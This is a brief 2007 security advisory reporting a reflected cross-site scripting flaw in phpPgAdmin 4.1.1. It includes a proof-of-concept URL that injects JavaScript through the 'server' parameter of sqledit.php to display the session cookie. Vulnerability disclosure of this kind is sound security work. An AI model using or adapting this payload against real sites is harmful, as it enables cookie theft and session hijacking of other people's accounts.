Home / os / solaris

phpPgAdmin-xss.txt

Posted on 23 May 2007

There is a JavaScript code Injection in phpPgAdmin which fails to correctly sanitize user supplied data. As a result very simple XSS is possible. This was tested on phpPgAdmin 4.1.1 as not logged user. PoC: https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');alert(document.cookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');// Regards Michal Majchrowicz. Hack.pl

 

TOP